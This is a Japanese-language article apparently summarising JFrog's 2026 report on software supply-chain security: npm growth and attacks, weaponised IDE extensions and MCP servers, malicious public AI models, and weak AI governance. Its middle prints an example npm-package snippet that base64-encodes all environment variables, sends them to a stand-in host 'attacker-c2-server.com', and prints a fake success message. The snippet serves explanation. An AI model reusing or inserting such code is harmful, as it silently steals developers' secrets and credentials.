現代のソフトウェア開発において、サプライチェーンの概念が根本から覆されようとしています。
JFrogが発表した最新の調査報告書「2026年版 ソフトウェア・サプライチェーン・セキュリティの現状」は、AIが単なる補助ツールではなく、サプライチェーンそのものへと進化したことを鮮明に描き出しました。
2025年から2026年にかけて、私たちはコードパッケージの爆発的な増加と、それに伴う攻撃手法の劇的な変化を目の当たりにしています。
もはやセキュリティの境界線は、自社が記述するコードや依存関係にあるオープンソースライブラリだけに留まりません。
ガバナンスが及ばない広大なAIモデルやエージェント型開発ツールの領域こそが、新たな主戦場となっているのです。
爆発するパッケージ数と悪意ある攻撃の急増
ソフトウェアエコシステムは、かつてないほどの速度で膨張を続けています。
2025年、ソフトウェアサプライチェーンには1,170万件もの新規パッケージが投入され、前年比で67%という驚異的な増加率を記録しました。
この急激な変化は、単なる数字の増加ではなく、開発の主体がAIや自動化ツールに移行している構造的な変化を反映しています。
エコシステムの主役交代:npmとPyPIの台頭
トラフィックデータに基づくと、長年トップに君臨していたApache Mavenを抑え、npmが最も利用されるパッケージエコシステムとなりました。
また、インフラ管理に広く使われてきたYUMをPyPIが追い抜いたことは、業界の関心がレガシーなインフラから、データサイエンスや機械学習へと完全にシフトしたことを象徴しています。
以下の表は、主要なパッケージマネージャーの動向をまとめたものです。
| エコシステム | 2025年新規パッケージ数 | 前年比の傾向 | 主な用途 |
|---|---|---|---|
| npm | 約400,000件 | 急増(Mavenを抜く) | JavaScript / フロントエンド |
| PyPI | 急増 | 上昇(YUMを抜く) | Python / AI・機械学習 |
| Apache Maven | 約98,000件 | 安定 | Java / エンタープライズ |
npmユーザーを襲う「史上最悪の年」
パッケージの流通量が増える一方で、攻撃者たちもこの肥大化したエコシステムを格好の標的としています。
JFrogの報告によると、npmにおける悪意ある活動は前年比で451%という衝撃的な急増を見せました。
攻撃者は、JavaScriptやNode.jsのレジストリに汚染されたライブラリを注入し、インストールと同時に機密情報を窃取するスクリプトを実行させます。
2025年には、3つの大規模なハイジャックキャンペーンにより、200万件以上の侵害されたダウンロードが発生したことが確認されています。
開発者のワークステーションを狙う「アップストリーム攻撃」
攻撃の焦点は、本番環境のサーバーから、開発者のデスクトップへと明確にシフトしています。
これをJFrogは「アップストリーム(上流)へのシフト」と呼んで警告しています。
攻撃者は、開発者が日常的に使用するIDE(統合開発環境)の拡張機能や、MCP(Model Context Protocol)サーバーを武器化しています。
武器化されるIDE拡張機能とMCPサーバー
開発効率を向上させるためのツールが、今や攻撃の初動を担うエントリーポイントとなっています。
例えば、悪意あるコードが含まれたnpmパッケージをインストールすると、開発者の環境で即座にバックドアが構築されます。
以下は、攻撃者が環境変数を外部サーバーへ送信するために使用する典型的な難読化コードの例です。
// 悪意あるnpmパッケージ内に隠されたコードの例
const http = require('http');
const { exec } = require('child_process');
// 環境変数を収集して外部へ送信する
const data = Buffer.from(JSON.stringify(process.env)).toString('base64');
const options = {
hostname: 'attacker-c2-server.com',
port: 80,
path: `/collect?d=${data}`,
method: 'GET'
};
const req = http.request(options);
req.end();
console.log("Package installed successfully."); // ユーザーには正常を装う
Package installed successfully.
(バックグラウンドで全環境変数が攻撃者のサーバーへ送信される)
このような攻撃は、「初回利用時」に瞬時に実行されるため、従来の後追い型の検知システムでは防ぐことが困難です。
AIガバナンスの形骸化と「ペーパー・セキュリティ」の罠
多くの企業がAIの導入を急ぐあまり、実効性のあるガバナンスが追いついていない実態が浮き彫りになりました。
調査対象となった企業の97%が「自社には認定されたAIガバナンスがある」と回答しています。
しかし、その実態を深掘りすると、開発ワークフロー内で動作するAIツールに対して、約5分の1の企業が一切の積極的な強制力を持っていないことが判明しました。
JFrogのCISO、ポール・デイビス氏はこれを「紙の上だけのガバナンスは、セキュリティ管理ではなく危険な思い込みである」と断じています。
パブリックレジストリから直接供給されるリスク
AI開発において、エンジニアがHugging FaceなどのパブリックレジストリからAIモデルを直接プルするケースが増えています。
調査によると、53%の組織がパブリックなソースから直接モデルを調達し、さらに53%がそれらを独自にホストしています。
しかし、これらのパブリックレジストリからは既に495個もの悪意あるモデルが検出されています。
AIモデル自体に悪意あるペイロードが仕込まれている場合、モデルをロードした瞬間にインフラ全体が侵害されるリスクがあるのです。
急増するAI/MLライブラリの管理負荷
組織が管理すべきAI/ML関連のパッケージ数は、前年比で47%増加しています。
これは、単一のAIサービスを利用する段階から、複数のサービスを組み合わせて独自のソリューションを構築するフェーズへと移行したことを意味します。
管理対象が急増したことで、セキュリティチームは脆弱性の優先順位付けに苦慮しています。
運用上の重荷:CVEのノイズとコンプライアンスの停滞
脆弱性情報の洪水(CVEノイズ)も、セキュリティ担当者を疲弊させる要因となっています。
脆弱性の報告数が増えることは、必ずしも実際のリスクが増えることを意味しません。
しかし、従来の「数」に基づいたトリアージ(優先順位付け)手法では、真に危険な脅威を見逃す可能性が高まっています。
監査対応に要する膨大な時間
セキュリティの運用負荷は、コンプライアンスの証明プロセスにも影を落としています。
企業の48%が、監査に耐えうるコンプライアンスレポートの作成に1週間以上の時間を要していると回答しました。
AI駆動の開発スピードが加速する中で、週単位の時間をかけるコンプライアンス対応は、もはや実用的なスピード感を失っています。
サイロ化された旧来のセキュリティ慣行が、現代の開発スピードにおける最大のボトルネックとなっているのです。
まとめ
JFrogの2026年報告書が示す未来は、AIがソフトウェアサプライチェーンの周辺要素から、その「核」へと移行した世界です。
攻撃者はこの構造的な変化をいち早く察知し、開発者のツールやAIモデルそのものを武器に変えて攻撃を仕掛けています。
企業がこれに対抗するためには、形式的なガバナンスから脱却し、バイナリやAIアーティファクトを直接制御する実効的なセキュリティ戦略への転換が不可欠です。
膨大なCVEのノイズに翻弄されるのではなく、リスクの発生源である「上流」を戦略的に監視することが、次世代のサプライチェーンを守る鍵となります。
AIの恩恵を安全に享受するためには、スピードとガバナンスを両立させるための新たな「システムの記録(System of Record)」が必要とされています。
